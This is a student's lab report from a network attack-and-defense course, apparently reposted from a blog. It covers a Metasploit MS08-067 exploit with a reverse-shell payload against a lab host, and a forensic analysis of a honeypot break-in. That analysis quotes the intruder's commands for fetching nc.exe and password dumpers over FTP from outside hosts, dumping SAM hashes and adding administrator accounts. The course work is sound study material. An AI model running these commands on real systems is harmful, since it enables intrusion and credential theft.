20212920 许邵 2021-2022-2 《网络攻防实践》实践六报告
作者:互联网
20212920 许邵 2021-2022-2 《网络攻防实践》实践六报告
1.实践内容
(1)动手实践Metasploit windows attacker
任务:使用metasploit软件进行windows远程渗透统计实验
具体任务内容:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权
(2)取证分析实践:解码一次成功的NT系统破解攻击。
来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。
(3)团队对抗实践:windows系统远程渗透攻击和分析。
攻方使用metasploit选择漏洞进行攻击,获得控制权。
防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。
2.实践过程
2.0 实践环境
攻击机:Windows XP,包含Metasploit软件,IP地址:192.168.200.3
靶机:Windows 2000 Server,IP地址:192.168.200.124;Metaspoitable Windows XP,IP地址:192.168.200.125.
2.1 远程渗透统计实验
在Windows XP攻击机上打开Metasploit 3.
加载完成后显示的界面是一个基于Bash的命令行界面,如下所示:
运行命令search ms08_067,查询ms08_067漏洞的详细信息。
[*] Searching loaded modules for pattern 'ms08_067'...
Exploits
========
Name Rank Description
---- ---- -----------
windows/smb/ms08_067_netapi great Microsoft Server Service Relative Path Stack Corruption
运行命令use windows/smb/ms08_067_netapi,进入漏洞所在文件。然后运行命令show options,查看可用选项。
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
运行命令show payloads,显示该漏洞的载荷。
输入命令:
set payload generic/shell_reverse_tcp,设置载荷
set RHOST 192.168.200.124,设置目标主机
set LHOST 192.168.200.3,设置攻击主机
输入命令exploit进行攻击。
可以发现,运行exploit后,攻击机成功盗取了目标主机的访问权限。如果在这里的命令行中输入ipconfig,可发现“该主机”的IP地址变为192.168.200.124了。
利用wireshark抓包分析可得该渗透攻击的攻击机和靶机,还有建立连接的端口。
追踪TCP流,可以看到靶机中输入的命令行和返回的信息被抓取。
2.2 取证分析实践
使用wireshark打开附件中的snort-0204@0117.log文件。
筛选数据包:在wireshark上方的筛选输入框中输入筛选条件:ip.addr==172.16.1.106 and http,然后追踪一个info中有%C0%AF的包的TCP流(如下图中的第117号包)。
我们可以从追踪的包中找到包含/..%C0%AF../的字符,说明攻击者利用了IIS Unicode漏洞进行了攻击。
追踪第149号数据流,可以看到出现了类似于shell("cmd /c echo")的字符,说明攻击者通过shell指令对目标进行操作,进一步分析得知,还利用了RDS漏洞允许任意代码执行的缺陷进行了操作。
进一步,可总结得出以下指令(注释是我自己标注的):
#第一段:攻击者拿到系统的访问权限
shell("cmd /c echo werd >> c:\fun")
shell("cmd /c echo user johna2k > ftpcom")
shell("cmd /c echo hacker2000 >> ftpcom")
shell("cmd /c echo get samdump.dll >> ftpcom")
shell("cmd /c echo get pdump.exe >> ftpcom")
shell("cmd /c echo get nc.exe >> ftpcom")
shell("cmd /c echo quit >> ftpcom")
shell("cmd /c ftp -s:ftpcom -n www.nether.net")
shell("cmd /c pdump.exe >> newpass")
shell("cmd /c echo user johna2k > ftpcom2")
shell("cmd /c echo hacker2000 >> ftpcom2")
shell("cmd /c put newpass >> ftpcom2")
shell("cmd /c echo quit >> ftpcom2")
shell("cmd /c ftp -s:ftpcom2 -n www.nether.net")
shell("cmd /c ftp -s:ftpcom2 -n www.nether.net")
shell("cmd /c ftp 213.116.251.162")
shell("cmd /c echo open 213.116.251.162 > ftpcom")
shell("cmd /c echo johna2k > ftpcom")
shell("cmd /c echo hacker2000 >> ftpcom")
shell("cmd /c echo get samdump.dll >> ftpcom")
shell("cmd /c echo get pdump.exe >> ftpcom")
shell("cmd /c echo get nc.exe >> ftpcom")
shell("cmd /c echo quit >> ftpcom")
shell("cmd /c ftp -s:ftpcom")
#第二段:向212.139.12.26和213.116.251.162写入了nc.exe文件
shell("cmd /c open 212.139.12.26")
shell("cmd /c echo johna2k >>sasfile")
shell("cmd /c echo haxedj00 >>sasfile")
shell("cmd /c echo get pdump.exe >>sasfile")
shell("cmd /c echo get samdump.dll >>sasfile")
shell("cmd /c echo get nc.exe >>sasfile")
shell("cmd /c echo quit >>sasfile")
shell("cmd /c ftp -s:sasfile")
shell("cmd /c open 213.116.251.162")
shell("cmd /c echo johna2k >>sasfile")
shell("cmd /c echo haxedj00 >>sasfile")
shell("cmd /c echo get pdump.exe >>sasfile")
shell("cmd /c echo get samdump.dll >>sasfile")
shell("cmd /c echo get nc.exe >>sasfile")
shell("cmd /c echo quit >>sasfile")
shell("cmd /c ftp -s:sasfile")
#第三段:写入破解的口令
shell("cmd /c C:\Program Files\Common Files\system\msadc\pdump.exe >>yay.txt")
shell("cmd /c C:\Program Files\Common Files\system\msadc\pdump.exe >> c:\yay.txt")
shell("cmd /c pdump.exe >> c:\yay.txt")
shell("cmd /c net session >>yay2.txt")
shell("cmd /c net session >>c:\yay2.txt")
shell("cmd /c net users >>heh.txt")
shell("cmd /c net users >>c:\heh.txt")
shell("cmd /c net localgroup Domain Admins IWAM_KENNY /ADD")
shell("cmd /c net localgroup Domain Admins IUSR_KENNY /ADD")
shell("cmd /c net localgroup administrators IUSR_KENNY /ADD")
shell("cmd /c net localgroup administrators IWAM_KENNY /ADD")
shell("cmd /c net user testuser UgotHacked /ADD")
shell("cmd /c net localgroup Administrators testuser /ADD")
#第四段:创建SAM文件副本
shell("cmd /c rdisk -/s")
shell("cmd /c rdisk -s")
shell("cmd /c rdisk")
shell("cmd /c rdisk -s/")
shell("cmd /c rdisk -s/")
shell("cmd /c rdisk /s-")
shell("cmd /c rdisk /s-")
shell("cmd /c rdisk /s-")
#第五段:删除和拷贝har.txt文件
shell("cmd /c type c:\winnt\repair\sam._ >>c:\har.txt")
shell("cmd /c del c:\inetpub\wwwroot\har.txt")
shell("cmd /c del c:\inetpub\wwwroot\har.txt")
shell("cmd /c net user IWAM_KENNY Snake69Snake69")
攻击者使用了什么破解工具进行攻击?
上述指令均采用了Microsoft Access Driver (*.mdb)的驱动,使用了c:\winnt\help\iis\htm\tutorial\btcustmr.mdb这个dbq文件。根据ADM!ROX!YOUR!WORLD这个特征字符串,查询得知攻击者应该是利用了由rain forest puppy所编写的 msadc(2).pl渗透攻击代码发起的攻击。
攻击者如何使用这个破解工具进入并控制了系统?
观察发现,每一次的攻击时间都很短,可见攻击者应该是先将指令写入了shell脚本,然后将这个脚本与msadc.pl攻击脚本一起执行的。
由上面的第一段shell命令可以看出,攻击者打开主机后,使用FTP的方式下载文件,使用samdunp拿到口令,再利用pdump.exe破解。在第四次破解,也就是打开IP地址为213.116.251.162的主机后,攻击者成功拿到了访问权限。
攻击者获得系统访问权限后做了什么?
攻击者获得了IWAM_KENNY和IUSR_KENNY的账号,并试图获取本地Administrator用户权限。
为此,攻击者将破解的口令写入了yay.txt中,将用户写入到hec.txt文件中。还试图删除和拷贝har.txt文件。
我们如何防止这样的攻击?
1.设置强口令,增大破解口令的难度。
2.定期检测以及修复漏洞,及时安装补丁。
你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么?
追踪174号TCP流tcp.stream eq 174,发现攻击者发送了这样一段命令:
echo best honeypot i've seen till now :) > rfp.txt
可见,攻击者已经发现了他的目标是一台蜜罐,他自愧不如。
2.3 Windows系统远程渗透攻击和分析
远程渗透和分析的步骤参照2.1节,这里不再一一赘述了。
PS:如何检测靶机的漏洞?
这里以靶机为Metasploitable Windows XP(IP地址为192.168.200.125)为例,在装有nmap的攻击机(如Kali Linux攻击机,IP地址为192.168.200.2)中输入并运行命令nmap -T4 -A -v --script vuln 192.168.200.125。
过一会即可检测到漏洞及其信息。
靶机包括两个致命漏洞:ms17_010和ms08_067。
这次攻击使用了ms08_067漏洞,ms17_010的“永恒之蓝”漏洞只适用于64位的windows系统。
3.学习中遇到的问题及解决
无
4.实践总结
随着网络攻击和防御技术的日益演进,新型的网络攻击方式层出不穷,给网络安全带来了极大的挑战。我们在使用操作系统时,一定要及时更新安全补丁,以及时防御对手的攻击。
参考资料
- 《网络攻防技术与实践》诸葛建伟,电子工业出版社
标签:shell,cmd,20212920,实践,echo,2021,攻击者,net,txt 来源: https://www.cnblogs.com/ywze1998/p/16162645.html